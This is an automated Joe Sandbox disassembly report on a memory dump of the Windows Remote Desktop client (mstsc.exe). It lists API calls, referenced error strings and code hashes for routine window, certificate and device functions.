                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0092B3A5
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000100), ref: 0092B430
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000100), ref: 0092B438
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ??2@??3@$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: HomeGroupUser$$PWSTR
                                                                                                                                                                                        • API String ID: 1240124958-672385545
                                                                                                                                                                                        • Opcode ID: 9830c04e856cc2c4bf80ff92e42beafa9f329f3b9a5e7338740b6d765fe8f241
                                                                                                                                                                                        • Instruction ID: e7b380ec228e41f73b518c185a4cddd5c9c647874f64d0f2792c8e4ccbfe7472
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9830c04e856cc2c4bf80ff92e42beafa9f329f3b9a5e7338740b6d765fe8f241
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5621E9726143116ED72DAB65BC85F2B37DDEB85324F25016AFA00E72B6CB64CC009B51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 008E64E1
                                                                                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 008E6506
                                                                                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 008E651E
                                                                                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 008E6525
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: System$Metrics$ByteCharInfoMultiParametersWide
                                                                                                                                                                                        • String ID: ($DISPLAY$h$h
                                                                                                                                                                                        • API String ID: 1415089127-1312831404
                                                                                                                                                                                        • Opcode ID: 740d33502cbbd88b30f14ab4252032020c4bc18d3712818120deafe4f8065154
                                                                                                                                                                                        • Instruction ID: cbe162abbdeb6e60f48ab55ed5e550a3640ff2aadc0bd2201714b4b8f2f55577
                                                                                                                                                                                        • Opcode Fuzzy Hash: 740d33502cbbd88b30f14ab4252032020c4bc18d3712818120deafe4f8065154
                                                                                                                                                                                        • Instruction Fuzzy Hash: CD21D8B2A142649BDF208F598C84B677B98FF16760F1001A6EC05EB185EB70DD50CBA5
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003309), ref: 00905B92
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000402,00000001,00000000), ref: 00905BAA
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 00905BB8
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,0000330B,?,?,00905623,?,?,?), ref: 00905BCF
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,0000330B,00000000,?,?), ref: 00905C18
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00905C1F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Item$MessageSendText$FreeLocal
                                                                                                                                                                                        • String ID: FormatMessage failed
                                                                                                                                                                                        • API String ID: 449125137-2409667863
                                                                                                                                                                                        • Opcode ID: 016b9c319874706bdf5fd2ece56031152a40d7650030003781f118a43ee4f437
                                                                                                                                                                                        • Instruction ID: 7235f0d13ebf0c0b23456fe4d973c77a8071166f309b72e87f501541245597dc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 016b9c319874706bdf5fd2ece56031152a40d7650030003781f118a43ee4f437
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F210571604718BFEB299B60CD89F6B7B69FB44710F150025F980AB1E2C771DE029F90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,00000000), ref: 00915BDA
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00915BE1
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00915BFE
                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00915C13
                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\mstsc.exe,?,00000104), ref: 00915C71
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc$CommandCurrentEnvironmentExpandFreeLibraryLineMessageProcessStringsTrace
                                                                                                                                                                                        • String ID: %windir%\system32\mstsc.exe$IsWow64Process$kernel32
                                                                                                                                                                                        • API String ID: 3350929514-3730019692
                                                                                                                                                                                        • Opcode ID: f6c7579aa7978e42b155ab61d167d3f3e6afab529efe5a5ca0079a37ccfefda8
                                                                                                                                                                                        • Instruction ID: 914423f4d5d70e4f878b2d6311be0d53b498599bd1aa59695d7b2c019050404a
                                                                                                                                                                                        • Opcode Fuzzy Hash: f6c7579aa7978e42b155ab61d167d3f3e6afab529efe5a5ca0079a37ccfefda8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0321AE72B5471CAFC7209FF4DD89BDA7BA8EB44304F020596E855E3291DA74CD809F92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 008EB252
                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 008EB258
                                                                                                                                                                                          • Part of subcall function 008ED776: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB5BC,00000016,00000000,?,0091570B,008E396B,00000000,0093AFA8,?,00934F32,0093AFA8,00000000), ref: 008ED787
                                                                                                                                                                                        • IsWindow.USER32(?), ref: 008EB285
                                                                                                                                                                                        • SendMessageW.USER32(?,00000423,00000000,00000000), ref: 008EB299
                                                                                                                                                                                        • ShowWindow.USER32(?,00000001), ref: 008EB2A4
                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 008EB2A9
                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 008EB2B5
                                                                                                                                                                                        • UpdateWindow.USER32 ref: 008EB2BE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Show$Message$ForegroundInvalidateRectSendTraceUpdate
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3422817459-0
                                                                                                                                                                                        • Opcode ID: 53bfb631974fdcafbbda8aa1ccd17625a2b6113d97a4eb7bc6047b5c5186fcbc
                                                                                                                                                                                        • Instruction ID: 418209dfe4986a24ccc7e172c2de7518fd4216d5d90b30c5851e88b34f33d9e7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 53bfb631974fdcafbbda8aa1ccd17625a2b6113d97a4eb7bc6047b5c5186fcbc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 13219FB1108744AFDB205F66DC89E67BBBAFF42715F004429F242A25B0C772AC91DF40
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CertVerifyCertificateChainPolicy.CRYPT32(00000002,?,0000000C,?), ref: 0092776A
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000002,?), ref: 00927798
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000002,?), ref: 009277C7
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        • CertFreeCertificateChain.CRYPT32(?,?,?,00000000,?,?,00000000,00000002,?), ref: 009278AA
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • RdpSignCertChainRevocationCheck, xrefs: 00927460
                                                                                                                                                                                        • ConstructCertificateChain failed!, xrefs: 009274E5
                                                                                                                                                                                        • ValidateCertificate failed, xrefs: 009278D0
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CertCertificateChainErrorFreeLast$AddressHandleLibraryMessageModulePolicyProcTraceVerify
                                                                                                                                                                                        • String ID: ConstructCertificateChain failed!$RdpSignCertChainRevocationCheck$ValidateCertificate failed
                                                                                                                                                                                        • API String ID: 3723874871-2658871624
                                                                                                                                                                                        • Opcode ID: ad060439dc8982ae764bf25bf60ffa84ea392dcf97142cf31a93ac066a762932
                                                                                                                                                                                        • Instruction ID: ab1ea8c729fa2c9e7f92203779f136ce233ecdd71794ea6c5f0d3b56ccb577b7
                                                                                                                                                                                        • Opcode Fuzzy Hash: ad060439dc8982ae764bf25bf60ffa84ea392dcf97142cf31a93ac066a762932
                                                                                                                                                                                        • Instruction Fuzzy Hash: DCE190316083519EDB2D9FA8E989B55BBEAFB09300F140449E581EB2BAC775CDC0DF52
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • LoadDefaultProfile Failed, xrefs: 0090C8FE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Message$AddressFreeHandleIconLibraryLoadModuleProcSendTrace
                                                                                                                                                                                        • String ID: LoadDefaultProfile Failed
                                                                                                                                                                                        • API String ID: 762468045-1435745046
                                                                                                                                                                                        • Opcode ID: c9229fd8e8f1912afe2c27a745023a1fd9a288ae586ad93f492a638c13502ac6
                                                                                                                                                                                        • Instruction ID: 3afb81a98b7040c85bb4705c45202cc7ff6644d7f7d3cfdf6cfdc84cb35f795b
                                                                                                                                                                                        • Opcode Fuzzy Hash: c9229fd8e8f1912afe2c27a745023a1fd9a288ae586ad93f492a638c13502ac6
                                                                                                                                                                                        • Instruction Fuzzy Hash: A1519EB52447409FDB29DF24D899B2937EAFB49304F1006A9F656DB2A2DB30EC44DF05
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000800,?,?,?,?,?,0092833F,?,?,00000000), ref: 0092845C
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Unable to initialize file name from moniker!, xrefs: 00928394
                                                                                                                                                                                        • Failed to close file stream!, xrefs: 00928427
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressAllocFreeHandleLibraryLocalMessageModuleProcTrace
                                                                                                                                                                                        • String ID: Failed to close file stream!$Unable to initialize file name from moniker!
                                                                                                                                                                                        • API String ID: 673940520-1650752352
                                                                                                                                                                                        • Opcode ID: dfdeb125d2925104acf0464e69d95c81594dc1b257531c3ff0d6e268c782dafc
                                                                                                                                                                                        • Instruction ID: 1e5968fe714f3a6b03598c807510c6c777f185c444eb510155dd28b60819cb34
                                                                                                                                                                                        • Opcode Fuzzy Hash: dfdeb125d2925104acf0464e69d95c81594dc1b257531c3ff0d6e268c782dafc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 445102716153A16FD7299F68E889F163BD9FB09310F040599F640DB2B6CB74EC409F85
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 008E0B04
                                                                                                                                                                                          • Part of subcall function 008E142A: GetLastError.KERNEL32(008E0B13), ref: 008E142A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                        • String ID: .tlb
                                                                                                                                                                                        • API String ID: 2776309574-1487266626
                                                                                                                                                                                        • Opcode ID: 6fbb2c7328f2ee994fdcd61be05dd7609d6882adab355e379b3a08bf47de9e2c
                                                                                                                                                                                        • Instruction ID: 28fe0a364b941f97e57f283fe1047cc6f23c5d4094e291de3a0a5200a17bf41c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fbb2c7328f2ee994fdcd61be05dd7609d6882adab355e379b3a08bf47de9e2c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2241A7719052699BCF109FA69C98ABE73B8FF56328F1045E9EC45E7200D7B49E84CF50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsWindow.USER32(?), ref: 008E70AF
                                                                                                                                                                                        • DestroyWindow.USER32 ref: 008E70BE
                                                                                                                                                                                        • IsWindow.USER32(?), ref: 008E70C7
                                                                                                                                                                                        • DestroyWindow.USER32 ref: 008E70D0
                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 008E70DF
                                                                                                                                                                                          • Part of subcall function 008E0259: EnterCriticalSection.KERNEL32(0093B000,00000000,?,008E011C,00000000,00000001,?,00000000,?,00000000,00000000,?,?,?,008E007F,?), ref: 008E0265
                                                                                                                                                                                          • Part of subcall function 008E0259: LeaveCriticalSection.KERNEL32(0093B000,?,008E011C,00000000,00000001,?,00000000,?,00000000,00000000,?,?,?,008E007F,?), ref: 008E02C7
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed RegisterPopupParentWindowClass(FALSE), xrefs: 008E711A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$CriticalDestroySection$DeleteEnterLeaveObject
                                                                                                                                                                                        • String ID: Failed RegisterPopupParentWindowClass(FALSE)
                                                                                                                                                                                        • API String ID: 557206002-2507639134
                                                                                                                                                                                        • Opcode ID: 58cb2aecc5542f3248d7d410218721c2fff50c1b4ffad6921d741b3637e0014f
                                                                                                                                                                                        • Instruction ID: f3e15b10da198a6c098c43f15cf4a76b579136a675b5b1fe0e498f383f9254b9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 58cb2aecc5542f3248d7d410218721c2fff50c1b4ffad6921d741b3637e0014f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 54318E70218B819FDB289F26DD98B2AB7A5FF85315F04042DE582C66B1CB71E841DF41
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • DynamicDevices, xrefs: 009013C3
                                                                                                                                                                                        • QI for IMsRdpClientNonScriptable3 failed!, xrefs: 0090118A
                                                                                                                                                                                        • IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 00901497
                                                                                                                                                                                        • IMsRdpDevice::get_DeviceInstanceId failed, xrefs: 0090144C
                                                                                                                                                                                        • IMsRdpClient5::get_DeviceCollection failed!, xrefs: 009011F2
                                                                                                                                                                                        • IMsRdpDeviceCollection::DeviceCount failed!, xrefs: 00901241
                                                                                                                                                                                        • StringCchCopy failed, xrefs: 00901516, 00901560
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                        • String ID: DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDevice::get_DeviceInstanceId failed$IMsRdpDeviceCollection::DeviceCount failed!$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
                                                                                                                                                                                        • API String ID: 2221118986-430872028
                                                                                                                                                                                        • Opcode ID: 7267e2ace6f3a708a61c24ca82da7962c4381202408c61e8159eb19b481ff64d
                                                                                                                                                                                        • Instruction ID: 03525acd3ffc2084422b17f116b8a7c8d02e3adaa80e57bc87407e4a3a00bad7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7267e2ace6f3a708a61c24ca82da7962c4381202408c61e8159eb19b481ff64d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DC1B431A003589FDB299F15DC89BAA77AAFF81304F148199E445AB2F1CB34DE85CF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000003C,?,?,?,?,?,0090C871,00000000,?,00000000,?), ref: 0090FBCE
                                                                                                                                                                                        • memset.MSVCRT ref: 0090FBE4
                                                                                                                                                                                        • _wtol.MSVCRT ref: 0090FC56
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        • _wtol.MSVCRT ref: 0090FCC7
                                                                                                                                                                                        • _wtol.MSVCRT ref: 0090FD1A
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0090FD36
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0090FE2E
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(0090C871), ref: 0090FE47
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _wtol$FreeLocal$??2@??3@AddressAllocHandleLibraryModuleProcmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2266593360-0
                                                                                                                                                                                        • Opcode ID: 33b1756c83c6574cf82fc61cfe3da9341b2e171f3b557b65a6c9c34a72953c18
                                                                                                                                                                                        • Instruction ID: 70dc81cb7aac1e0fbcfa6c757111c8a893747dc3a92793897b1c5f15ac492e96
                                                                                                                                                                                        • Opcode Fuzzy Hash: 33b1756c83c6574cf82fc61cfe3da9341b2e171f3b557b65a6c9c34a72953c18
                                                                                                                                                                                        • Instruction Fuzzy Hash: C0818A716007019FDB28DF65C959F267BE5AB48700F01066CEA4A8BBE2DB78E940CF45
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 008EF727: IsWindow.USER32(?), ref: 008EF757
                                                                                                                                                                                          • Part of subcall function 008EF727: GetWindowLongW.USER32(008EF1A5,000000F0), ref: 008EF789
                                                                                                                                                                                          • Part of subcall function 008EF727: GetWindowLongW.USER32(008EF1A5,000000EC), ref: 008EF79D
                                                                                                                                                                                          • Part of subcall function 008EF727: GetMenu.USER32(008EF1A5,00000000,?,?,?,008EF1A5), ref: 008EF7A3
                                                                                                                                                                                          • Part of subcall function 008EF727: AdjustWindowRectEx.USER32(00000000,?,00000000), ref: 008EF7B5
                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 008EF1CF
                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 008EF1F3
                                                                                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 008EF1FE
                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 008EF225
                                                                                                                                                                                        • ShowWindow.USER32(?,00000009), ref: 008EF27A
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000002), ref: 008EF28D
                                                                                                                                                                                        • SetFocus.USER32 ref: 008EF2C2
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008EF2CC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Long$RectText$AdjustErrorFocusLastMenuShow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3365892010-0
                                                                                                                                                                                        • Opcode ID: 560264509671d6da70c54293b8c89fe14e13d034e89b5e6334bf034875455092
                                                                                                                                                                                        • Instruction ID: f22d652acbb86b4db0712c8bf7cb308e3a3fe81629afa366c57bd40fecaf5f1e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 560264509671d6da70c54293b8c89fe14e13d034e89b5e6334bf034875455092
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F51AEB56007089FEB14CF79C989BAEB7F9FF49304F004529EA56E3292CB30A801CB14
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00001088,0093A020,756F2CDC,?,009112AF,?,?,00001084,00001088), ref: 0091288D
                                                                                                                                                                                        • GetLastError.KERNEL32(?,009112AF,?,?,00001084,00001088), ref: 00912899
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,009112AF,?,?,00001084,00001088), ref: 009128F7
                                                                                                                                                                                        • memset.MSVCRT ref: 00912955
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00912969
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00912975
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 009129CC
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteCharErrorLastLocalMultiWide$AllocFreememset
                                                                                                                                                                                        • String ID: pDest
                                                                                                                                                                                        • API String ID: 183355994-920669795
                                                                                                                                                                                        • Opcode ID: 3cebd4239ae3b5bab78f81ded9172c8daf63cd21197338d5b27ed4347445b4e3
                                                                                                                                                                                        • Instruction ID: 834e194346c9880678c06b36ee395024f45824be915ae4e3b6d14a27f613fd59
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cebd4239ae3b5bab78f81ded9172c8daf63cd21197338d5b27ed4347445b4e3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F4117722043086FD7296F589E49FA63B9DFB45310F150059F900DB2B2C675CCA09BA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00907195
                                                                                                                                                                                        • GetDlgItem.USER32(?,009075DD), ref: 009071AE
                                                                                                                                                                                        • GetClientRect.USER32(00000000,?,?,?,?,?,?,009075DD,?,0093A2E0,00000005,?,?,008D6D74), ref: 009071C4
                                                                                                                                                                                        • SendMessageW.USER32(009075DD,00000031,00000000,00000000), ref: 009071D7
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 009071E3
